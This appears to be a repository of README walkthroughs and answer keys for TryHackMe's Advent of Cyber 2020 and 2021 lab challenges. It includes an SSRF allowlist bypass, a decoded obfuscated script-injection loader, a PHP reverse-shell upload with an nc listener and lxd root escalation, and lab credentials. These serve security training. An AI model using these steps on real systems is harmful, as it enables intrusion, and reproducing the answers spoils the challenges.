FILE: Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md
================================================
# Where's Rudolph?
- What URL will take me directly to Rudolph's Reddit comment history?
- Google is your best friend. `https://www.reddit.com/user/IGuidetheClaus2020/comments/`
- According to Rudolph, where was he born?
- `Chicago`
- Rudolph mentions Robert. Can you use Google to tell me Robert's last name?
- Google is your friend.. `May`
- On what other social media platform might Rudolph have an account?
- Twitter Search
- `https://twitter.com/IGuideClaus2020`
- `twitter`
- What is Rudolph's username on that platform?
- `IGuideClaus2020`
- What appears to be Rudolph's favorite TV show right now?
- `bachelorette`, by twitter feed.
- Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
- `Chicago`
- Okay, you found the city, but where specifically was one of the photos taken?
- [photo with higher resolution](https://twitter.com/IGuideClaus2020/status/1331615839318138883)
- Upload on [exif.regex.info](http://exif.regex.info)
- `41.891815, -87.624277`
- Did you find a flag too?
- `{FLAG}**********************`
- Has Rudolph been pwned? What password of his appeared in a breach?
- [Scylla Search](https://scylla.sh/api)
- The email is shown on Twitter `rudolphthered@hotmail.com`.
- `*******`
- Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?
- `41.891815, -87.624277` on Google Maps
- `Chicago Marriott Downtown` on Google Search
- `540`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md
================================================
# There's a Python in my stocking!
- What's the output of True + True?
- `2`
- What's the database for installing other peoples libraries called?
- `PyPi`
- What is the output of bool("False")?
- `True`
- What library lets us download the HTML of a webpage?
- `requests`
- What is the output of the program provided in "Code to analyse for Question 5" in today's material?
(This code is located above the Christmas banner and below the links in the main body of this task)
- `[1, 2, 3, 6]`
- What causes the previous task to output that?
- `pass by reference`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md
================================================
# Help! Where is Santa?
Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
Santa has a webpage at `<TARGET_IP>/static/index.html`
- What is the port number for the web server?
- `nmap -p -10000 <TARGET_IP>`
- `8000`
- What is the directory for the API, without the API key?
- Visit `http://<TARGET_IP>:8000/` and inspect code
- `/api/`
- Where is Santa right now?
- Change the `TARGET_API` in `api_fuzzer.py`
- `python3 api_fuzzer.py`
- `Winter Wonderland, Hyde Park, London`
- Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance (<TARGET_IP>)
- `57`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py
================================================
import requests
TARGET_API = "HERE YOUR TARGET_IP"
for i in range(0, 100):
if i %2 == 1:
response = requests.get('http://' + TARGET_API + ':8000/api/{}'.format(str(i)))
print(str(i) + " : " + str(response.status_code))
print(response.text)
================================================
FILE: Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md
================================================
# ReverseELFneering
Username: elfmceager
Password: adventofcyber
Use your new-found knowledge of Radare2 to analyse the "challenge1" file in the Instance <TARGET_IP> that is attached to this task to answer the questions below.
Connect by ssh to the target.
- ssh elfmceager@<TARGET_IP>, type `yes` and enter the password `adventofcyber`.
- What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
- `./file1`
- `r2 -d ./file1`
- Inside r2> `aa`
- `afl | grep main`
- `pdf @maini`
- `1`
- What is the value of eax when the imull instruction is called?
- `db 0x00400b55`
- `pdf @main`
- `dc`
- `px @rbp-0xc`
- `ds`
- `px @rbp-0xc`
- `dr`
- `ds`
- `dr`
- `6`
- What is the value of local_4h before eax is set to 0?
- Play with breakpoints and registers
- `6`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md
================================================
# The Bits of Christmas
Username: `cmnatic`
Password: `Adventofcyber!`
- Open the "TBFC_APP" application in ILspy and begin decompiling the code
- Open `Remmina` on your machine or download it with `sudo apt install remmina`
- Start Remmina, enter the IP, the username and password.
- Open ILSpy, click `File` and open `TBFC_APP`
- What is Santa's password?
- In the root folder we see there are a lot of contents. Functions, libraries, main. Then we find a folder called `CrackMe`. Inside that folder there is the Main form code. If you analyze all the code when the button `Sumbit password` is pressed it calls the function `buttonActivate_Click`... mmmh. Let's take a look.
- The first function called is reference to a Module that include this `internal static $ArrayType$$$BY0BB@$$CBD ??_C@_0BB@IKKDFEPG@****************@/* Not supported: data(** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **) */;`. :)
- `*************`
- Now that you've retrieved this password, try to login...What is the flag?
- `***{*****}`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/README.md
================================================
# The Naughty or Nice List
- Once the VM is deployed, connect to the web app: `http://<TARGET_IP>`
- Enter a name in the form and click the "Search" button. When the page loads, it should tell you whether that name is on the Naughty List or the Nice List. Notice that the URL for the page looks something like this: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3DTib3rius`
- If we use a URL decoder on the value of the "proxy" parameter, we get: `http://list.hohoho:8080/search.php?name=Tib3rius`
- Since "list.hohoho" is not a valid hostname on the Internet (.hohoho is not a top-level domain), this hostname likely refers to some back-end machine. It seems that the web app works by taking this URL, making a request at the back-end, and then returning the result to the front-end web app. If the developer has not been careful, we may be able to exploit this functionality using Server-Side Request Forgery (SSRF).
- The most obvious thing we can try to do first is to fetch the root of the same site. Browse to: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2F`
- This seems to have potential, as in place of the original "Tib3rius is on the Nice List." message, we instead see "Not Found. The requested URL was not found on this server." This seems like a generic 404 message, indicating that we were able to make the server request the modified URL and return the response.
- There are many things we could do now, such as trying to find valid URLs for the "list.hohoho" site. We could also try changing the port number from 8080 to something else, to see if we can connect to any other services running on the host, even if these services are not web servers.
- Try changing the port number from 8080 to just 80 (the default HTTP port): `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A80`
- The message now changes to "Failed to connect to list.hohoho port 80: Connection refused" which suggests that port 80 is not open on list.hohoho.
- Try changing the port number to 22 (the default SSH port): `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho%3A22`
- The message now changes to "Recv failure: Connection reset by peer" which suggests that port 22 is open but did not understand what was sent (this makes sense, as sending an HTTP request to an SSH server will not get you anywhere!)
- Enumerating open ports via SSRF can be performed in this manner, by iterating over common ports and measuring the differences between responses. Even in cases where error messages aren't returned, it is often possible to detect which ports are open vs closed by measuring the time each request takes to complete.
- Another thing we can try to do with SSRF is access services running locally on the server. We can do this by replacing the list.hohoho hostname with "localhost" or "127.0.0.1" (among others). Try this now: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flocalhost`
- Oops! It looks like the developer has a check in place for this, as the message returned says "Your search has been blocked by our security team."
- Indeed, if you try other hostnames (e.g. 127.0.0.1, example.com, etc.) they will all be blocked. The developer has implemented a check to ensure that the hostname provided starts with "list.hohoho", and will block any hostnames that don't.
- As it turns out, this check can easily be bypassed. Since the hostname simply needs to start with "list.hohoho", we can take advantage of DNS subdomains and create our own domain "list.hohoho.evilsite.com" which resolves to 127.0.0.1. In fact, we don't even need to buy a domain or configure the DNS, because multiple domains already exist that let us do this. The one we will be using is localtest.me, which resolves every subdomain to 127.0.0.1.
- We can therefore set the hostname in the URL to "list.hohoho.localtest.me", bypass the check, and access local services: `http://<TARGET_IP>/?proxy=http%3A%2F%2Flist.hohoho.localtest.me`
- Success! It appears that there is a web server running locally, and it has a message from Elf McSkidy that contains some sensitive information we can use!
- Click the "Admin" link at the top or scroll down to the login. Guess the username and use the password you found to login as Santa.
- Delete the naughty list to find the challenge flag!
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md
================================================
# PowershELlF to the rescue
- Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
- `ssh -l mceager <TARGET_IP>`
- Enter the password `r0ckStar!`
- `powershell` and wait until you see a new terminal
- `Set-Location ./Documents/`
- `Get-ChildItem -File`
- `Get-ChildItem -File -Hidden`
- Notice there is a hidden file `e1fone.txt` and a visible `elfone.txt`.
- `Get-Content elfone.txt`
- `Get-Content e1fone.txt`
- `2 front teeth`
- Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?
- `cd ..`
- `Set-Location Desktop`
- `Get-Content -File -Hidden`
- `Set-Location .\elf2wo\`
- `Get-Content .\e70smsW10Y4k.txt`
- `Scrooged`
- Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)
- `Set-Location C:\Windows`
- `Get-ChildItem -Filter "*3*" -Recurse -Directory -Hidden -ErrorAction SilentlyContinue`
- `Set-Location .\System32\3lfthr3e\`
- `3lfthr3e`
- How many words does the first file contain?
- `Get-Content 1.txt | Measure-Object -Word`
- `9999`
- What 2 words are at index 551 and 6991 in the first file?
- `(Get-Content .\1.txt)[551]`
- `(Get-Content .\1.txt)[6991]` or `Get-Content 1.txt | Select-Object -Index 551,6991`
- `Red Ryder`
- This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)
- `Get-Content 2.txt | Select-String -Pattern "redryder"`
- `Red Ryder bb gun`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md
================================================
# Time for some ELForensics
User name: `littlehelper`
User password: `iLove5now!`
Open Remmina and connect yourself to the remote machine.
- Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
- Open PowerShell in remote machine
- `Set-Location Documents`
- `Get-ChildItem`
- `Get-Content '.\db file hash.txt'`
- `********************856E6A78E3A1`
- What is the file hash of the mysterious executable within the Documents folder?
- `Get-FileHash -Algorithm MD5 deebee.exe`
- `********************6EB12AED09F0`
- Using Strings find the hidden flag within the executable?
- `C:\Tools\strings64.exe -accepteula deebee.exe`
- Read carefully the output
- `THM{*******************************}`
- What is the flag that is displayed when you run the database connector file?
- `Get-Item -Path .\deebee.exe -Stream *`
- `wmic process call create $(Resolve-Path .\deebee.exe:hidedb)`
- `THM{*******************************}`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-22-Elf_McEager_becomes_CyberElf/README.md
================================================
# Elf McEager becomes CyberElf
For Server provide (<TARGET_IP>) as the IP address provided to you for the remote machine. The credentials for the user account is:
- User name: `Administrator`
- User password: `sn0wF!akes!!!`
So then let's connect ourselves to the remote machine using Remmina.
We'll use [CyberChef](https://gchq.github.io/CyberChef/) also.
- What is the password to the KeePass database?
- Open the `dGhlZ3J*******FzaGVyZQ==` folder, then executes the Keepass executable and try to enter the password `mceagerrockstar`. Wrong.
- Open CyberCher and try to decode the folder name.
- Put `dGhlZ3J*******FzaGVyZQ==` in the Input panel and add to recipe `Magic`. It's probably Base64.
- `**************re`
- Let's enter the password inside Keepass.
- What is the encoding method listed as the 'Matching ops'?
- You an see this in output panel
- `Base64`
- What is the decoded password value of the Elf Server?
- Navigate into Network tab (in Keepass).
- Double click on the unique entry.
- Click on the button to see the password without bullets, read the notes below.
- Paste this in input on CyberChef.
- Use the recipe `From Hex`.
- `********`
- What is the decoded password value for ElfMail?
- Switch Keepass tab to see eMail entries.
- Copy the elfMail password and read the notes.
- `i****;3S*****;a*****;i*******g!`
- Paste this input in CyberChef with recipe `From HTML Entity`.
- `********ng!`
- Decode the last encoded value. What is the flag?
- Switch Keepass tab to see Recycle Bin entries.
- Open the unique entry.
- The password shown in cleartext without bullets is `nothinghere`. Mhh...
- Let's read the notes.
eval(String.fromCharCode(118, 97, 114, 32, 115,44, 32, 49, 49, 53, 44, 32, 53,... [ ... ] ..., 53, 54, 44, 32, 57, 56, 44, 32, 15, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
- Put this in CyberCHEF Input and take as recipe `From CharCode`, delimiter `comma`, base `10`.
.ar somestring = document.createElement('script'); somestring.type = 'text/javascript'; somestring.async = true;somestring.src = String.fromCharCode(104, 104, 116, 116, 112, ... [ ... ] ..., 22, 97, 47); var alls = document.getElementsByTagName('script'); var nt3 = true; for ( var i = alls.length; i--;) { if (alls[i].src.indexOf(String.fromCharCode(49, 49, 100, 51,... [ ... ] ... 56, 98, 56)) > -1) { nt3 = false;} } if(nt3 == true){document.getElementsByTagName("head")[0].appendChild(somestring); }
- Let's add another rule to the recipe, the same as before. It's seems there are things to be evaluated twice.
- `.https://gist.github.com/heavenraiza/1d321244c4**********d9a3298a88b8`
- `THM{********************************}`
### see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md
================================================
# The Grinch strikes again!
Use Remmina to connect to the target machine as the documentation in the [proper page](https://tryhackme.com/room/adventofcyber2) tells you.
- User name: `administrator`
- User password: `sn0wF!akes!!!`
- Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?
- `echo -n "bm9tb3J************pdmFsY29tcGFueQ==" | base64 -d`
- `nomore******************`
- At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?
- `.grinch`
- What is the name of the suspicious scheduled task?
- `opidsfsdf`
- Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
- `C:\Users\Administrator\Desktop\oidsfsdf.exe`
- There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
- `7a9eea15-000-0000-0000-010000000000`
- Assign the hidden partition a letter. What is the name of the hidden folder?
- `confidential`
- Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?
- `*********************`
# see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-24-The_Trial_Before_Christmas/README.md
================================================
# The Trial Before Christmas
- Scan the machine. What ports are open?
- `scilla port -target <TARGET_IP>`, [scilla here](https://github.com/edoardottt/scilla)
- `80, 65000`
- What's the title of the hidden website? It's worthwhile looking recursively at all websites on the box for this step.
- `http://<TARGET_IP>:65000`
- `Light Cycle`
- What is the name of the hidden php page?
- `gobuster dir -u http://<TARGET_IP>:65000 -x .php -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `uploads.php`
- What is the name of the hidden directory where file uploads are saved?
- `scilla dir -target http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt`
- `grid`
- Bypass the filters. Upload and execute a reverse shell.
no answer needed
- Navigate to `http://<TARGET_IP>:65000/uploads.php`
- Download [php-reverse-shell](https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php)
- Change the ip from the default to yours ip.
- Upload the file.
- Damn. Invalid file.
- Let's look to the validation.
- Found `assets/js/filter.js`.
~~~
const filter = file => {
if(["image/png", "image/jpeg", "image/jpg"].indexOf(file.type) < 0){
return false;
} else if (["png", "jpeg", "jpg"].indexOf(file.name.split(".").pop()) < 0){
return false;
}
//Let's be honest -- these things are dangerous. May as well always return false ¯\_(ツ)_/¯
return false;
}
~~~
- This instead in `upload.js`
~~~
const upload = () => {
let file = uploadInput.files[0];
if(typeof filter === "function"){
if(!filter(file)){
changeMsg("Invalid File Type");
return;
}
}
~~~
- Mhhh...
- And here we are: `accept=".png,.jpg,.jpeg"`
- Rename that file to `rshell.jpg.php`
- We have to avoid the download/usage of `filter.js`.
- We can block it using the Developers Tools (F12) or using Burp.
- *tips* If you are having trouble, clear all the cache/data in browser.
- Move to `http://<TARGET_IP>:65000/grid/`
- On your machine `nc -lnvp 1234`
- Click on the uploaded file.
- What is the value of the web.txt flag?
- `python3 -c 'import pty;pty.spawn("/bin/bash")'`
- `cat /var/www/web.txt`
- `THM{**************}`
- Upgrade and stabilize your shell.
no answer needed
- Referred to the first command of the previous task (`python3...`).
- Review the configuration files for the webserver to find some useful loot in the form of credentials. What credentials do you find? username:password
- `cd /var/www/TheGrid`
- `ls -alh`
- `cd includes`
- `cat dbauth.php`
- `tron:I****************`
- Access the database and discover the encrypted credentials. What is the name of the database you find these in?
- `mysql -u tron -p`
- Enter the password.
- `show databases;`
- `tron`
- Crack the password. What is it?
- `show tables;`
- `use users;`
- `select * from users;`
~~~
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | flynn | ed*********d19a13********* |
+----+----------+----------------------------------+
~~~
- `hash-identifier`
- [crackstation](https://crackstation.net/)
- `**********`
- Use su to login to the newly discovered user by exploiting password reuse.
no answer needed
- Exit from mysql client with `exit`.
- `su flynn`
- Enter the password
- What is the value of the user.txt flag?
- `cd ~`
- `ls`
- `cat flag.txt`
- `THM{********_****_***********}`
- Check the user's groups. Which group can be leveraged to escalate privileges?
- `id`
- `lxd`
- Abuse this group to escalate privileges to root.
no answer needed
- Check with `lxc image list` on target machine which containers are available locally.
~~~
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
~~~
- `lxc init IMAGENAME CONTAINERNAME -c security.privileged=true`
- `lxc config device add CONTAINERNAME DEVICENAME disk source=/ path=/mnt/root recursive=true`
- `lxc start CONTAINERNAME`
- `lxc exec CONTAINERNAME /bin/sh`
- `id`
- What is the value of the root.txt flag?
- `cd /mnt/root/root`
- `THM{***********}`
~~~
"As Elf McEager claimed the root flag a click could be heard as a small chamber on the anterior of the NUC popped open. Inside, McEager saw a small object, roughly the size of an SD card. As a moment, he realized that was exactly what it was. Perplexed, McEager shuffled around his desk to pick up the card and slot it into his computer. Immediately this prompted a window to open with the word 'HOLO' embossed in the center of what appeared to be a network of computers. Beneath this McEager read the following: Thank you for playing! Merry Christmas and happy holidays to all!"
~~~
# Have a nice XMas !!!
================================================
FILE: Advent-of-Cyber-2020/README.md
================================================
# Advent of Cyber 2020 🎄🎅
## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
These are all the things I have produced during my Advent of Cyber 2020. I hope you will have fun as I had completing this AoC.
Please, before emailing me, be sure you've read all the introduction part above the questions; really it's a good source to learn new things.
================================================
FILE: Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md
================================================
# Day 1 - Save the gifts
The trick is to change the user id until you find the correct one.
- After finding Santa's account, what is their position in the company?
- `*********`
- After finding McStocker's account, what is their position in the company?
- `*************`
- After finding the account responsible for tampering, what is their position in the company?
- `***************`
- What is the received flag when McSkidy fixes the Inventory Management System?
- `THM{*****************}`
- If you want to learn more about IDOR vulnerabilities, we suggest trying out this room https://tryhackme.com/room/idor
No answer needed
- Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 2's task!
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md
================================================
# Day 2 Elf HR Problems
- Open the static site in a new tab, here.
no answer needed
- Register an account, and verify the cookies using the Developer Tools in your browser.
- What is the name of the new cookie that was created for your account?
- Go in the developer tools using F12 and then look at the application tab, then under cookies you will find the cookies.
- `*********`
- What encoding type was used for the cookie value?
- Go to [CyberChef](https://gchq.github.io/CyberChef/), insert the cookie value as input and insert magic as recipe.
- `***********`
- What object format is the data of the cookie stored in?
- `***n`
- Manipulate the cookie and bypass the login portal.
- What is the value of the administrator cookie? (username = admin)
- Just go on CyberChef and do the inverse, change the user from yours to 'admin' and compute "To Hex".
- `******************...***************`
- What team environment is not responding?
- `**`
- What team environment has a network warning?
- `**********`
- If you want to learn more about Authentication bypasses, we suggest trying out this room https://tryhackme.com/jr/authenticationbypass
No answer needed
Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 3's task, where InsiderPHD will be recording a video walkthrough!
================================================
FILE: Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md
================================================
# Day 3 - Christmas Blackout
- Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?
- `*****`
- In your web browser, try some default credentials on the newly discovered login form for the "administrator" user. What is the password?
- `***************`
- Access the admin panel. What is the value of the flag?
- `********************`
================================================
FILE: Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md
================================================
# Day 4 - Santa's Running Behind
- Access the login form at http://MACHINE_IP
No answer needed
- Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.
No answer needed
What valid password can you use to access the "santa" account?
- `******`
- What is the flag in Santa's itinerary?
- `***************`
================================================
FILE: Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md
================================================
# Day 5 - Pesky Elf Forum
- What flag did you get when you disabled the plugin?
- `*****************`
================================================
FILE: Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md
================================================
# Day 6 - Patch Management Is Hard
- Deploy the attached VM and look around. What is the entry point for our web application?
- `err`
- Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
- `***************************`
- Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?
- `***************************`
McSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?
Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?
- `MCSkidy:**********`
- Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
- `**************************`
- The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
- `**************************************`
- Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md
================================================
# Day 7 - Migration Without Security
- Interact with the MongoDB server to find the flag. What is the flag?
- `***{********************************}`
We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?
Use the knowledge given in AoC3 day 4 to setup and run Burp Suite proxy to intercept the HTTP request for the login page. Then modify the POST parameter.
- `***{********************************}`
- Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
- `***{********************************}`
- Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
- `*************************************`
================================================
FILE: Advent-of-Cyber-2021/Day-08-Santas_Bag_of_Toys/README.md
================================================
# Day 8 - Santa's Bag of Toys
Read the premise above, start the attached Windows analysis machine and find the transcription logs in the SantasLaptopLogs folder on the Desktop.
If you want to RDP into the machine, start the AttackBox and enter the following into a terminal: `xfreerdp /u:Administrator /p:grinch123! /v:MACHINE_IP`
- The credentials for the machine are Administrator as the username, and grinch123! as the password.
No answer needed
Each transcription log is a simple plain text file that you can open in any editor of your choice. While the filenames are random, you can get an idea as to which log "comes first" by looking at the Date Modified or Date Created attributes, or the timestamps just before the file extension!
Open the first transcription log. You can see the commands and output for everything that ran within PowerShell, like whoami and systeminfo!
- What operating system is Santa's laptop running ("OS Name")?
- `********* ******* ** ***`
Review each transcription log to get an idea for what activity was performed on the laptop just after it went missing. In the "second" transcription log, it seems as if the perpetrator created a backdoor user account!
- What was the password set for the new "backdoor" account?
- `********************`
- In one of the transcription logs, the bad actor interacts with the target under the new backdoor user account, and copies a unique file to the Desktop. Before it is copied to the Desktop, what is the full path of the original file?
- `*:*****************************************************.***`
The actor uses a Living Off The Land binary (LOLbin) to encode this file, and then verifies it succeeded by viewing the output file. What is the name of this LOLbin?
- Read the above and open the ShellBagsExplorer.exe application found in the folder on your Desktop.
No answer needed
With ShellBagsExplorer.exe open, use the top-bar menu to select File -> Load offline hive and navigate to the location of where you saved the decoded UsrClass.dat . Load in the UsrClass.dat file and begin to explore the Shellbags discovered!
Under the Desktop folder, there seems to be a suspicious folder named "SantaRat". Could this be a remote access trojan, that was used for further nefarious activity on Santa's laptop? Unfortunately, from just Shellbags alone, we only have insight into folder names (sometimes files, if we are lucky) and column data within Windows Explorer, but not files... how could we uncover more details?
- Drill down into the folders and see if you can find anything that might indicate how we could better track down what this SantaRat really is. What specific folder name clues us in that this might be publicly accessible software hosted on a code-sharing platform?
- `******`
Additionally, there is a unique folder named "Bag of Toys" on the Desktop! This must be where Santa prepares his collection of toys, and this is certainly sensitive data that the actor could have compromised. What is the name of the file found in this folder?
- What is the name of the user that owns the SantaRat repository?
- `**********`
- Explore the other repositories that this user owns. What is the name of the repository that seems especially pertinent to our investigation?
- `*********************`
- Read the information presented in this repository. It seems as if the actor has, in fact, compromised and tampered with Santa's bag of toys! You can review the activity in the transcription logs. It looks as if the actor installed a special utility to collect and eventually exfiltrate the bag of toys. What is the name of the executable that installed a unique utility the actor used to collect the bag of toys?
- `*****************.***`
In the last transcription log, you can see the activity that this actor used to tamper with Santa's bag of toys! It looks as if they collected the original contents with a UHA archive. A UHA archive is similar to a ZIP or RAR archive, but faster and with better compression rates. It is very rare to see, but it looks the Grinch Enterprises are pulling out all the tricks!
You can see the actor compressed the original contents of the bag of toys with a password. Unfortunately, we are unable to see what the specific password was in these transcription logs! Perhaps we could find it elsewhere...
Following this, the actor looks to have removed everything from the bag of toys, and added in new things like coal, mold, worms, and more! What are the contents of these "malicious" files (coal, mold, and all the others)?
We know that the actor seemingly collected the original bag of toys. Maybe there was a slight OPSEC mistake, and we might be able to recover Santa's Bag of Toys! Review the actor's repository for its planned operations... maybe in the commit messages, we could find the original archive and the password!
- What is the password to the original bag_of_toys.uha archive? (You do not need to perform any password-cracking or bruteforce attempts)
- `***************************`
McSkidy was able to download and save a copy of the bag_of_toys.uha archive, and you have it accessible on the Desktop of the Windows analysis machine. After uncovering the password from the actor's GitHub repository, you have everything you need to restore Santa's original bag of toys!!
Double-click on the archive on the desktop to open a graphical UHARC extraction utility that has been prepared for you. Using the password you uncovered, extract the contents into a location of your choosing (you might make a "Bag of Toys" directory on the Desktop to save all the files into).
With that, you have successfully recovered the original contents of Santa's Bag of Toys! You can view these in the Windows Explorer file browser to see how many were present.
- How many original files were present in Santa's Bag of Toys?
- `***`
================================================
FILE: Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md
================================================
# Day 9 - Where Is All This Data Going
- In the HTTP #1 - GET requests section, which directory is found on the web server?
- `*****`
- What is the username and password used in the login page in the HTTP #2 - POST section?
- `*******************`
- What is the User-Agent's name that has been sent in HTTP #2 - POST section?
- `***************************************`
- In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?
- `*******************************`
- In the FTP section, what is the FTP login password?
- `**********`
- In the FTP section, what is the FTP command used to upload the secret.txt file?
- `****`
- In the FTP section, what is the content of the secret.txt file?
- `*********`
================================================
FILE: Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md
================================================
# Day10 - Offensive Is The Best Defence
- Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?
- `*`
- What is the smallest port number that is open?
- `**`
- What is the service related to the highest port number you found in the first question?
- `****`
- Now run nmap -sS MACHINE_IP. Did you get the same results? (Y/N)
- `*`
- If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP. What is the version number of the web server?
- `*****************`
- By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?
- `**************`
- You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?
- `*****`
- What is the name of the program listening on the newly discovered port?
- `*******`
If you would like to learn more about the topics covered in today’s tasks, we recommend checking out the Network Security module.
No answer needed
================================================
FILE: Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md
================================================
# Day 11 - Where Are The Reindeers?
- There is an open port related to MS SQL Server accessible over the network. What is the port number?
- `nmap -Pn <TARGET_IP>`
- `****`
- If the connection is successful, you will get a prompt. What is the prompt that you have received?
- `sqsh -S <TARGET_IP> -U sa -P t7uLKzddQzVjVFJp`
- `**`
- We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
- `*******`
- Check the table schedule. What is the destination of the trip scheduled on December 7?
- `select * from reindeer.dbo.schedule;`
- `******`
- Check the table presents. What is the quantity available for the present “Power Bank”?
- `select * from reindeer.dbo.presents;`
- `*****`
- There is a flag hidden in the grinch user's home directory. What are its contents?
- `xp_cmdshell 'dir C:\Users\grinch';`
- `xp_cmdshell 'dir C:\Users\grinch\Documents';`
- `xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';`
- `***************`
================================================
FILE: Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md
================================================
Day12 - Sharing Without Caring
- Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn 10.10.112.197 for the scan to work correctly. How many TCP ports are open?
- `*`
- In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
- `****`
- How many shares did you find?
- `*`
- How many shares show “everyone”?
- `*`
- What is the title of file 2680-0.txt?
- `***********`
- It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
- `************`
- We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
- `*******************************`
================================================
